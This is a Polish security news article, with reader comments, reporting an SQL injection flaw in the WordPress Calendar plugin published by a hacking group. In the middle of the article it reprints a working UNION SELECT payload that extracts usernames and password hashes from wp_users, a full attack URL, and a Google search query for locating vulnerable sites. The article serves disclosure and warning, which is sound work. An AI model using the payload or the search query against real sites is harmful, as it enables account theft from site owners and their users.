WordPress Calendar Plugin podatny na atak Sql Injection!
- Dodano: 31 stycznia 2010
- Wprowadził: hcsl.pl
- Komentarze: 6
Grupa hakerów określająca się mianem Sec Attack Team opublikował dziś szczegółowe informacje dotyczące luki odkrytej we wtyczce WordPress Calendar. Znaleziony błąd pozwala na wykonanie ataku typu Sql Injection i w konsekwencji nieuprawniony dostęp do bazy danych.
Libańska grupa Sec Attack Team przedstawiła następujące możliwości wykorzystania podatności wtyczki:
- www.site.com/?event_id=[kod Sql]
- www.site.com/Path/?event_id=[kod Sql]
Sam kod pozwalający na wyciągnięcie z bazy danych informacji o poświadczeniach użytkowników wygląda następująco:
null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users
Przykładowy atak może więc przyjąć postać następującego odwołania do serwisu internetowego:
http://server/calendar?event_id=-27+union+select+ 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users
Warto również nadmienić, że do odnalezienia witryn podatnych na ten konkretny atak może posłużyć odpowiednio skonstruowane zapytanie do wyszukiwarki Google, w postaci „powered by WordPress” inurl:”/?event_id=”. Zapytanie takie zwraca na chwilę obecną 2240 wyników.
Materiał pochodzi z serwisu HARD CORE SECURITY LAB.
Więcej informacji: http://www.exploit-db.com/exploits/11302
Znalazłeś literówkę? Zgłoś ją używając formularza!
Jeśli uważasz, że ten nius jest nieobiektywny, przedstawia nieprawdziwe wydarzenie, jest spamem lub nie spełnia standardów serwisu, napisz raport.
Niusy na podobny temat:
Komentarze są prywatnymi opiniami dodających je osób. Prosimy o zachowanie kultury wypowiedzi. Komentarze obraźliwe oraz obniżające poziom serwisu będą usuwane. Więcej w regulaminie komentowania.
6 komentarzy
Wszystkie autorskie niusy w serwisie publikowane są na licencji Creative Commons Uznanie autorstwa 2.5 Polska.
Eeee… też mi wiadomość. Jakiś bzdurny plugin napisany przez kogoś, kto najwyraźniej nie wziął sobie do serca problemów z bezpieczeństwem programów – zdarza się.
Lepiej napisz o tym, że deweloperzy wprawdzie mało znanego cms'a (chyba raz o nim wcześniej słyszałem – nie interesują mnie te klimaty) e107 pod pretekstem aktualizacji poważnej luki wprowadzili użytkownikom backdoora
Polecam przyjrzeć się Backdoor in e107 CMS version 0.7.17 na LWN – ubaw po pachy.
No cóż, nie pisałem o sprawie e107 CMS, bo jak sam zauważyłeś mało kto słyszał o tym systemie. WordPress Calendar nie jest wcale tak rzadko używany: http://www.google.pl/search?hl=pl&source=hp&q=%E2…. To ponad 2 tysiące serwisów potencjalnie podatnych na atak…
Problem w tym, że opisałeś gotowe rozwiązanie. Script kiddies prawdopodobnie już to testują.
Nie, gotowe rozwiązanie opublikowała grupa Sec Attack Team, a ja ostrzegam przed jego istnieniem. W przypadku gdy właśnie takie "gotowe" rozwiązanie krąży już w sieci moim zdaniem z punktu widzenia bezpieczeństwa słuszne jest przekazywanie na jego temat wszystkich dostępnych informacji, tak by zainteresowani zdawali sobie sprawę z istnienia luki i mogli ewentualnie sami przetestować swój serwis.
Crackerom i script kiddies mój news nie jest potrzebny, oni już wiedzą o tej luce…
Linuxnews jest podatny?:P
Nie jest podatny.